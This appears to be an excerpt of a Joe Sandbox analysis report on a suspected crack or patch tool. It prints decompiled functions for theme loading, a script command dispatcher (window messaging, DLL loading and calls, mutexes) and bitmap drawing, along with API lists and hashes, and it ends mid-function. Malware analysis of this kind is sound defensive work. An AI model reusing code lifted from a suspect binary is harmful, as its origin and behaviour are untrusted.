0x0044bf77
0x0044bc28
0x0044bbef
0x0044bf86
0x0044bf89
0x0044bf8c
0x0044bf9e

APIs

Part of subcall function 0044BB38: GetVersionExA.KERNEL32(00000094), ref: 0044BB55

Part of subcall function 0044BB8C: GetSystemDirectoryA.KERNEL32 ref: 0044BBA4

LoadLibraryA.KERNEL32(00000000,00000000,0044BF9F,?,?,?,?,00000000,00000000,?,0044FDE1,0049BA76), ref: 0044BC1E
GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044BC36
GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044BC48
GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044BC5A
GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044BC6C
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044BC7E
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044BC90
GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044BCA2
GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044BCB4
GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044BCC6
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044BCD8
GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044BCEA
GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044BCFC
GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044BD0E
GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044BD20
GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044BD32
GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044BD44
GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044BD56
GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044BD68
GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044BD7A
GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044BD8C
GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044BD9E
GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044BDB0
GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044BDC2
GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044BDD4
GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044BDE6
GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044BDF8
GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044BE0A
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044BE1C
GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044BE2E
GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044BE40
GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044BE52
GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044BE64
GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044BE76
GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044BE88
GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044BE9A
GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044BEAC
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044BEBE
GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044BED0
GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044BEE2
GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044BEF4
GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044BF06
GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044BF18
GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044BF2A
GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044BF3C
GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044BF4E
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044BF60
GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044BF72

Strings

GetThemeEnumValue, xrefs: 0044BD96
GetThemeSysInt, xrefs: 0044BEA4
IsThemeDialogTextureEnabled, xrefs: 0044BEFE
GetCurrentThemeName, xrefs: 0044BF34
GetWindowTheme, xrefs: 0044BEDA
GetThemeRect, xrefs: 0044BDCC
DrawThemeBackground, xrefs: 0044BC52
SetThemeAppProperties, xrefs: 0044BF22
GetThemeBackgroundRegion, xrefs: 0044BCD0
GetThemeSysSize, xrefs: 0044BE6E
GetThemeBool, xrefs: 0044BD72
OpenThemeData, xrefs: 0044BC2E
SetWindowTheme, xrefs: 0044BE14
DrawThemeText, xrefs: 0044BC64
GetThemeString, xrefs: 0044BD60
HitTestThemeBackground, xrefs: 0044BCE2
GetThemePosition, xrefs: 0044BDA8
GetThemeSysFont, xrefs: 0044BE80
GetThemeIntList, xrefs: 0044BDF0
IsThemeBackgroundPartiallyTransparent, xrefs: 0044BD2A
IsAppThemed, xrefs: 0044BEC8
GetThemeDocumentationProperty, xrefs: 0044BF46
GetThemePropertyOrigin, xrefs: 0044BE02
EnableThemeDialogTexture, xrefs: 0044BEEC
GetThemeInt, xrefs: 0044BD84
GetThemeTextExtent, xrefs: 0044BCAC
DrawThemeEdge, xrefs: 0044BCF4
uxtheme.dll, xrefs: 0044BC0B
GetThemeMetric, xrefs: 0044BD4E
GetThemeSysBool, xrefs: 0044BE5C
IsThemePartDefined, xrefs: 0044BD18
DrawThemeParentBackground, xrefs: 0044BF58
GetThemeSysColorBrush, xrefs: 0044BE4A
GetThemeBackgroundContentRect, xrefs: 0044BC76, 0044BC88
GetThemeTextMetrics, xrefs: 0044BCBE
GetThemeFont, xrefs: 0044BDBA
GetThemeMargins, xrefs: 0044BDDE
CloseThemeData, xrefs: 0044BC40
DrawThemeIcon, xrefs: 0044BD06
GetThemeAppProperties, xrefs: 0044BF10
GetThemeFilename, xrefs: 0044BE26
GetThemePartSize, xrefs: 0044BC9A
GetThemeColor, xrefs: 0044BD3C
IsThemeActive, xrefs: 0044BEB6
EnableTheming, xrefs: 0044BF6A
GetThemeSysColor, xrefs: 0044BE38
GetThemeSysString, xrefs: 0044BE92

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystemVersion
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 2754715182-2910565190
Opcode ID: 196f2664f59b7b389abefbd4b1c14e3b7a0f2582c5f559e53ad14ce6b1dec8f6
Instruction ID: ecd7112d65f411c7eccfc6eab1653a3c74b71e6b2ad24da097032ecd241f34bd
Opcode Fuzzy Hash: 196f2664f59b7b389abefbd4b1c14e3b7a0f2582c5f559e53ad14ce6b1dec8f6
Instruction Fuzzy Hash: 3AA14DB0A41710EBEB40EFF6DCC6A2A37A8EB15B1475405BBB440EF295D6789C048F5E

Uniqueness

Uniqueness Score: -1.00%

Function 004952EC Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431
sleepCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004952EC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				char _v5;
				char _v12;
				char _v16;
				long _t81;
				long _t90;
				signed int _t103;
				CHAR* _t109;
				long _t128;
				long _t136;
				int _t138;
				signed int _t141;
				long _t145;
				int _t147;
				signed int _t150;
				long _t154;
				int _t156;
				long _t170;
				int _t172;
				int _t174;
				signed int _t177;
				long _t181;
				int _t183;
				int _t185;
				signed int _t188;
				long _t192;
				int _t194;
				int _t196;
				void* _t220;
				intOrPtr _t276;
				intOrPtr* _t368;
				intOrPtr* _t369;
				void* _t372;
				intOrPtr _t375;

				_t378 = __fp0;
				_t220 = __ecx;
				_t374 = _t375;
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_t219 = _a4;
				_push(_t375);
				_push(0x4957e1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t375;
				_t372 =  *((intOrPtr*)(_a4 + 0xc)) - 1;
				_v5 = 1;
				E00403684( *((intOrPtr*)(__edx + 0x10)), 0x4957fc);
				if(_t372 != 0) {
					E00403684( *((intOrPtr*)(__edx + 0x10)), "FINDWINDOWBYCLASSNAME");
					if(__eflags != 0) {
						E00403684( *((intOrPtr*)(__edx + 0x10)), "FINDWINDOWBYWINDOWNAME");
						if(__eflags != 0) {
							E00403684( *((intOrPtr*)(__edx + 0x10)), "SENDMESSAGE");
							if(__eflags != 0) {
								E00403684( *((intOrPtr*)(__edx + 0x10)), "POSTMESSAGE");
								if(__eflags != 0) {
									E00403684( *((intOrPtr*)(__edx + 0x10)), "SENDNOTIFYMESSAGE");
									if(__eflags != 0) {
										E00403684( *((intOrPtr*)(__edx + 0x10)), "REGISTERWINDOWMESSAGE");
										if(__eflags != 0) {
											E00403684( *((intOrPtr*)(__edx + 0x10)), "SENDBROADCASTMESSAGE");
											if(__eflags != 0) {
												E00403684( *((intOrPtr*)(__edx + 0x10)), "POSTBROADCASTMESSAGE");
												if(__eflags != 0) {
													E00403684( *((intOrPtr*)(__edx + 0x10)), "SENDBROADCASTNOTIFYMESSAGE");
													if(__eflags != 0) {
														E00403684( *((intOrPtr*)(__edx + 0x10)), "LOADDLL");
														if(__eflags != 0) {
															E00403684( *((intOrPtr*)(__edx + 0x10)), "CALLDLLPROC");
															if(__eflags != 0) {
																E00403684( *((intOrPtr*)(__edx + 0x10)), "FREEDLL");
																if(__eflags != 0) {
																	E00403684( *((intOrPtr*)(__edx + 0x10)), "CREATEMUTEX");
																	if(__eflags != 0) {
																		E00403684( *((intOrPtr*)(__edx + 0x10)), "OEMTOCHARBUFF");
																		if(__eflags != 0) {
																			E00403684( *((intOrPtr*)(__edx + 0x10)), "CHARTOOEMBUFF");
																			if(__eflags != 0) {
																				_v5 = 0;
																			} else {
																				E0048F41C(_t219,  &_v12, _t372);
																				_t81 = E00403574(_v12);
																				CharToOemBuffA(E00403738(_v12), _t83, _t81);
																				E0048F434();
																			}
																		} else {
																			E0048F41C(_t219,  &_v12, _t372);
																			_t90 = E00403574(_v12);
																			OemToCharBuffA(E00403738(_v12), _t92, _t90);
																			E0048F434();
																		}
																	} else {
																		E004474E8(_t219,  &_v16, _t372, __edx);
																		CreateMutexA(0, 0, E00403738(_v16));
																	}
																} else {
																	_t103 = FreeLibrary(E0044748C(_t219, _t220, _t372 - 1, __fp0));
																	asm("sbb ecx, ecx");
																	E004475C0(_t219,  ~( ~_t103), _t372, _t374, __fp0);
																}
															} else {
																E004474E8(_t219,  &_v16, _t372 - 2, __edx);
																_t109 = E00403738(_v16);
																_t368 = GetProcAddress(E0044748C(_t219,  &_v16, _t372 - 1, __fp0), _t109);
																__eflags = _t368;
																if(_t368 == 0) {
																	E004475C0(_t219, 0, _t372, _t374, __fp0);
																} else {
																	E00447768(_t219,  *_t368(E0044748C(_t219,  &_v16, _t372 - 3, __fp0), E0044748C(_t219,  &_v16, _t372 - 4, __fp0)), _t372 - 5, _t374, __fp0);
																	E004475C0(_t219, 1, _t372, _t374, __fp0);
																}
															}
														} else {
															E004474E8(_t219,  &_v16, _t372 - 1, __edx);
															_t369 = E0042E824(_v16, _t219, 0x8000);
															__eflags = _t369;
															if(_t369 == 0) {
																_t128 = GetLastError();
																__eflags = _t372 - 2;
																E00447768(_t219, _t128, _t372 - 2, _t374, __fp0);
															} else {
																E00447768(_t219, 0, _t372 - 2, _t374, __fp0);
															}
															E00447768(_t219, _t369, _t372, _t374, _t378);
														}
													} else {
														_t136 = E0044748C(_t219, _t220, _t372 - 3, __fp0);
														_t138 = E0044748C(_t219, _t220, _t372 - 2, __fp0);
														_t141 = SendNotifyMessageA(0xffff, E0044748C(_t219, _t220, _t372 - 1, __fp0), _t138, _t136);
														asm("sbb ecx, ecx");
														E004475C0(_t219,  ~( ~_t141), _t372, _t374, __fp0);
													}
												} else {
													_t145 = E0044748C(_t219, _t220, _t372 - 3, __fp0);
													_t147 = E0044748C(_t219, _t220, _t372 - 2, __fp0);
													_t150 = PostMessageA(0xffff, E0044748C(_t219, _t220, _t372 - 1, __fp0), _t147, _t145);
													asm("sbb ecx, ecx");
													E004475C0(_t219,  ~( ~_t150), _t372, _t374, __fp0);
												}
											} else {
												_t154 = E0044748C(_t219, _t220, _t372 - 3, __fp0);
												_t156 = E0044748C(_t219, _t220, _t372 - 2, __fp0);
												E00447768(_t219, SendMessageA(0xffff, E0044748C(_t219, _t220, _t372 - 1, __fp0), _t156, _t154), _t372, _t374, __fp0);
											}
										} else {
											E004474E8(_t219,  &_v16, _t372 - 1, __edx);
											E00447768(_t219, RegisterClipboardFormatA(E00403738(_v16)), _t372, _t374, __fp0);
										}
									} else {
										_t170 = E0044748C(_t219, _t220, _t372 - 4, __fp0);
										_t172 = E0044748C(_t219, _t220, _t372 - 3, __fp0);
										_t174 = E0044748C(_t219, _t220, _t372 - 2, __fp0);
										_t177 = SendNotifyMessageA(E0044748C(_t219, _t220, _t372 - 1, __fp0), _t174, _t172, _t170);
										asm("sbb ecx, ecx");
										E004475C0(_t219,  ~( ~_t177), _t372, _t374, __fp0);
									}
								} else {
									_t181 = E0044748C(_t219, _t220, _t372 - 4, __fp0);
									_t183 = E0044748C(_t219, _t220, _t372 - 3, __fp0);
									_t185 = E0044748C(_t219, _t220, _t372 - 2, __fp0);
									_t188 = PostMessageA(E0044748C(_t219, _t220, _t372 - 1, __fp0), _t185, _t183, _t181);
									asm("sbb ecx, ecx");
									E004475C0(_t219,  ~( ~_t188), _t372, _t374, __fp0);
								}
							} else {
								_t192 = E0044748C(_t219, _t220, _t372 - 4, __fp0);
								_t194 = E0044748C(_t219, _t220, _t372 - 3, __fp0);
								_t196 = E0044748C(_t219, _t220, _t372 - 2, __fp0);
								E00447768(_t219, SendMessageA(E0044748C(_t219, _t220, _t372 - 1, __fp0), _t196, _t194, _t192), _t372, _t374, __fp0);
							}
						} else {
							E004474E8(_t219,  &_v16, _t372 - 1, __edx);
							E00447768(_t219, FindWindowA(0, E00403738(_v16)), _t372, _t374, __fp0);
						}
					} else {
						E004474E8(_t219,  &_v16, _t372 - 1, __edx);
						E00447768(_t219, FindWindowA(E00403738(_v16), 0), _t372, _t374, __fp0);
					}
				} else {
					Sleep(E0044748C(_t219, _t220, _t372, __fp0));
				}
				_pop(_t276);
				 *[fs:eax] = _t276;
				_push(0x4957e8);
				return E00403420( &_v16, 2);
			}

0x004952ec
0x004952ec
0x004952ed
0x004952ef
0x004952f1
0x004952f3
0x004952f5
0x004952fa
0x004952ff
0x00495300
0x00495305
0x00495308
0x0049530e
0x0049530f
0x0049531b
0x00495320
0x0049533e
0x00495343
0x0049537a
0x0049537f
0x004953b6
0x004953bb
0x0049540c
0x00495411
0x00495468
0x0049546d
0x004954c4
0x004954c9
0x004954fe
0x00495503
0x0049554c
0x00495551
0x004955a0
0x004955a5
0x004955f4
0x004955f9
0x00495656
0x0049565b
0x004956dd
0x004956e2
0x00495712
0x00495717
0x00495744
0x00495749
0x00495787
0x0049578c
0x004957c2
0x0049578e
0x00495795
0x0049579d
0x004957af
0x004957bb
0x004957bb
0x0049574b
0x00495752
0x0049575a
0x0049576c
0x00495778
0x00495778
0x00495719
0x00495720
0x00495732
0x00495732
0x004956e4
0x004956ef
0x004956f8
0x00495700
0x00495700
0x0049565d
0x00495667
0x0049566f
0x00495685
0x00495687
0x00495689
0x004956cb
0x0049568b
0x004956b0
0x004956bb
0x004956bb
0x00495689
0x004955fb
0x00495603
0x00495615
0x00495617
0x00495619
0x0049562b
0x00495634
0x00495639
0x0049561b
0x00495624
0x00495624
0x00495644
0x00495644
0x004955a7
0x004955ae
0x004955bb
0x004955d1
0x004955da
0x004955e2
0x004955e2
0x00495553
0x0049555a
0x00495567
0x0049557d
0x00495586
0x0049558e
0x0049558e
0x00495505
0x0049550c
0x00495519
0x0049553a
0x0049553a
0x004954cb
0x004954d3
0x004954ec
0x004954ec
0x0049546f
0x00495476
0x00495483
0x00495490
0x004954a1
0x004954aa
0x004954b2
0x004954b2
0x00495413
0x0049541a
0x00495427
0x00495434
0x00495445
0x0049544e
0x00495456
0x00495456
0x004953bd
0x004953c4
0x004953d1
0x004953de
0x004953fa
0x004953fa
0x00495381
0x00495389
0x004953a4
0x004953a4
0x00495345
0x0049534f
0x00495368
0x00495368
0x00495322
0x0049532c
0x0049532c
0x004957c8
0x004957cb
0x004957ce
0x004957e0

APIs

Sleep.KERNEL32(00000000,00000000,004957E1,?,?,?,?,00000000,00000000,00000000), ref: 0049532C
FindWindowA.USER32 ref: 0049535D

Strings

POSTMESSAGE, xrefs: 00495407
FREEDLL, xrefs: 004956D8
SLEEP, xrefs: 00495316
FINDWINDOWBYWINDOWNAME, xrefs: 00495375
OEMTOCHARBUFF, xrefs: 0049573F
CALLDLLPROC, xrefs: 00495651
SENDBROADCASTMESSAGE, xrefs: 004954F9
FINDWINDOWBYCLASSNAME, xrefs: 00495339
CHARTOOEMBUFF, xrefs: 00495782
REGISTERWINDOWMESSAGE, xrefs: 004954BF
LOADDLL, xrefs: 004955EF
SENDNOTIFYMESSAGE, xrefs: 00495463
POSTBROADCASTMESSAGE, xrefs: 00495547
SENDBROADCASTNOTIFYMESSAGE, xrefs: 0049559B
CREATEMUTEX, xrefs: 0049570D
SENDMESSAGE, xrefs: 004953B1

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: FindSleepWindow
String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
API String ID: 3078808852-3310373309
Opcode ID: f8848a1a84b024abead4a61a3e9036c19501452696533f8aaac553cb32939556
Instruction ID: 81b0b0a091168c97ae0ef179256dddc1b1175ea621cc4e7edfbae85d46dbfd27
Opcode Fuzzy Hash: f8848a1a84b024abead4a61a3e9036c19501452696533f8aaac553cb32939556
Instruction Fuzzy Hash: BEC17364B04A006BDB11BA7E8C8252F5D999F98704B21D97FB406EB78BCE3CDD0A435D

Uniqueness

Uniqueness Score: -1.00%

Function 0041CE9C Relevance: 33.2, APIs: 22, Instructions: 213
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041CE9C(void* __eax, int __ecx, struct HPALETTE__* __edx, char _a4, intOrPtr _a8, int _a12) {
				void* _v8;
				struct HPALETTE__* _v12;
				struct HBITMAP__* _v16;
				void* _v20;
				void* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				struct HDC__* _v36;
				struct tagRECT _v52;
				struct HBRUSH__* _t115;
				intOrPtr _t136;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr _t149;
				int _t152;
				int _t155;
				void* _t158;
				void* _t160;
				intOrPtr _t161;

				_t158 = _t160;
				_t161 = _t160 + 0xffffffd0;
				_t155 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t136 = _a8;
				_t152 = _a12;
				_v16 = 0;
				if(_v8 != 0 || __ecx != 0 && _t152 != 0) {
					_v28 = GetDC(0);
					_v32 = CreateCompatibleDC(_v28);
					_push(_t158);
					_push(0x41d0f2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t161;
					if(_a4 == 0) {
						_v16 = CreateCompatibleBitmap(_v28, _t155, _t152);
					} else {
						_v16 = CreateBitmap(_t155, _t152, 1, 1, 0);
					}
					if(_v16 == 0) {
						E0041B824();
					}
					_v24 = SelectObject(_v32, _v16);
					_push(_t158);
					_push(0x41d0ab);
					_push( *[fs:eax]);
					 *[fs:eax] = _t161;
					if(_t136 == 0) {
						PatBlt(_v32, 0, 0, _t155, _t152, 0xff0062);
					} else {
						_t115 = E0041AB70( *((intOrPtr*)(_t136 + 0x14)));
						E0040AED8(0, _t155, 0,  &_v52, _t152);
						FillRect(_v32,  &_v52, _t115);
						SetTextColor(_v32, E0041A4E8( *((intOrPtr*)( *((intOrPtr*)(_t136 + 0xc)) + 0x10))));
						SetBkColor(_v32, E0041A4E8(E0041AB34( *((intOrPtr*)(_t136 + 0x14)))));
					}
					if(_v8 == 0) {
						_pop(_t147);
						 *[fs:eax] = _t147;
						_pop(_t148);
						 *[fs:eax] = _t148;
						_push(0x41d0f9);
						DeleteDC(_v32);
						return ReleaseDC(0, _v28);
					} else {
						_v36 = CreateCompatibleDC(_v28);
						if(_v36 == 0) {
							E0041B824();
						}
						_push(_t158);
						_push(0x41d09a);
						_push( *[fs:eax]);
						 *[fs:eax] = _t161;
						E0041CCC8(_v8);
						_v20 = SelectObject(_v36, _v8);
						if(_v12 != 0) {
							SelectPalette(_v36, _v12, 1);
							RealizePalette(_v36);
							SelectPalette(_v32, _v12, 1);
							RealizePalette(_v32);
						}
						if(_t136 != 0) {
							SetTextColor(_v36, E0041A4E8( *((intOrPtr*)( *((intOrPtr*)(_t136 + 0xc)) + 0x10))));
							SetBkColor(_v36, E0041A4E8(E0041AB34( *((intOrPtr*)(_t136 + 0x14)))));
						}
						BitBlt(_v32, 0, 0, _t155, _t152, _v36, 0, 0, 0xcc0020);
						SelectObject(_v36, _v20);
						_pop(_t149);
						 *[fs:eax] = _t149;
						_push(0x41d0a1);
						return DeleteDC(_v36);
					}
				} else {
					return _v16;
				}
			}

0x0041ce9d
0x0041ce9f
0x0041cea5
0x0041cea7
0x0041ceaa
0x0041cead
0x0041ceb0
0x0041ceb5
0x0041cebc
0x0041ced5
0x0041cee1
0x0041cee6
0x0041cee7
0x0041ceec
0x0041ceef
0x0041cef6
0x0041cf15
0x0041cef8
0x0041cf05
0x0041cf05
0x0041cf1c
0x0041cf1e
0x0041cf1e
0x0041cf30
0x0041cf35
0x0041cf36
0x0041cf3b
0x0041cf3e
0x0041cf43
0x0041cfa8
0x0041cf45
0x0041cf48
0x0041cf59
0x0041cf66
0x0041cf7b
0x0041cf92
0x0041cf92
0x0041cfb1
0x0041d0a3
0x0041d0a6
0x0041d0d2
0x0041d0d5
0x0041d0d8
0x0041d0e1
0x0041d0f1
0x0041cfb7
0x0041cfc0
0x0041cfc7
0x0041cfc9
0x0041cfc9
0x0041cfd0
0x0041cfd1
0x0041cfd6
0x0041cfd9
0x0041cfdf
0x0041cff1
0x0041cff8
0x0041d004
0x0041d00d
0x0041d01c
0x0041d025
0x0041d025
0x0041d02c
0x0041d03e
0x0041d055
0x0041d055
0x0041d071
0x0041d07e
0x0041d085
0x0041d088
0x0041d08b
0x0041d099
0x0041d099
0x0041d0f9
0x0041d102
0x0041d102

APIs

GetDC.USER32(00000000), ref: 0041CED0
CreateCompatibleDC.GDI32(?), ref: 0041CEDC
CreateBitmap.GDI32(0041ADD4,?,00000001,00000001,00000000), ref: 0041CF00
CreateCompatibleBitmap.GDI32(?,0041ADD4,?), ref: 0041CF10
SelectObject.GDI32(0041D2CC,00000000), ref: 0041CF2B
FillRect.USER32 ref: 0041CF66
SetTextColor.GDI32(0041D2CC,00000000), ref: 0041CF7B
SetBkColor.GDI32(0041D2CC,00000000), ref: 0041CF92
PatBlt.GDI32(0041D2CC,00000000,00000000,0041ADD4,?,00FF0062), ref: 0041CFA8
CreateCompatibleDC.GDI32(?), ref: 0041CFBB
SelectObject.GDI32(00000000,00000000), ref: 0041CFEC
SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041D004
RealizePalette.GDI32(00000000), ref: 0041D00D
SelectPalette.GDI32(0041D2CC,00000000,00000001), ref: 0041D01C
RealizePalette.GDI32(0041D2CC), ref: 0041D025
SetTextColor.GDI32(00000000,00000000), ref: 0041D03E
SetBkColor.GDI32(00000000,00000000), ref: 0041D055
BitBlt.GDI32(0041D2CC,00000000,00000000,0041ADD4,?,00000000,00000000,00000000,00CC0020), ref: 0041D071
SelectObject.GDI32(00000000,?), ref: 0041D07E
DeleteDC.GDI32(00000000), ref: 0041D094

Part of subcall function 0041A4E8: GetSysColor.USER32(?), ref: 0041A4F2

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
String ID:
API String ID: 269503290-0
Opcode ID: 6fe929e3afe2a13338af335e0b683deee4c25105ce56022b6ded3cf3a3571e5b
Instruction ID: 50a53eb504fbb6e8939598bee840ef50963709612b5229ad76d17b3bfbc4c74e
Opcode Fuzzy Hash: 6fe929e3afe2a13338af335e0b683deee4c25105ce56022b6ded3cf3a3571e5b
Instruction Fuzzy Hash: 8061DD71E44605AFDF10EBA9DC46FAFB7B8EF48704F10446AF504E7281C67CA9418B69

Uniqueness

Uniqueness Score: -1.00%

Function 00456E68 Relevance: 26.6, APIs: 4, Strings: 11, Instructions: 310
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00456E68(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, signed int _a12, intOrPtr _a16, char _a20, short _a24, intOrPtr _a28, intOrPtr _a32, char _a36, intOrPtr _a40, intOrPtr _a44) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				short _v32;
				char _v40;
				char _v44;
				char* _t98;
				intOrPtr* _t104;
				intOrPtr* _t109;
				intOrPtr* _t113;
				void* _t115;
				signed int _t116;
				intOrPtr* _t118;
				intOrPtr* _t124;
				intOrPtr* _t130;
				intOrPtr* _t133;
				intOrPtr* _t136;
				intOrPtr* _t152;
				void* _t154;
				intOrPtr* _t155;
				intOrPtr* _t161;
				signed int _t164;
				intOrPtr* _t166;
				intOrPtr* _t175;
				void* _t177;
				intOrPtr _t179;
				intOrPtr* _t184;
				void* _t186;
				intOrPtr* _t192;
				intOrPtr* _t196;
				intOrPtr* _t201;
				char* _t210;
				intOrPtr _t215;
				intOrPtr _t227;
				intOrPtr _t235;
				void* _t244;
				void* _t246;
				intOrPtr _t247;
				void* _t249;
				void* _t250;
				intOrPtr _t251;

				_t216 = __ecx;
				_t249 = _t250;
				_t251 = _t250 + 0xffffffd8;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v44 = 0;
				_t244 = __ecx;
				_t246 = __edx;
				_v8 = __eax;
				_t215 = _a16;
				E00403728(_a36);
				_push(_t249);
				_push(0x457213);
				_push( *[fs:eax]);
				 *[fs:eax] = _t251;
				if(_a20 == 0) {
					_t98 = 0x80004005;
				} else {
					_t98 =  &_v12;
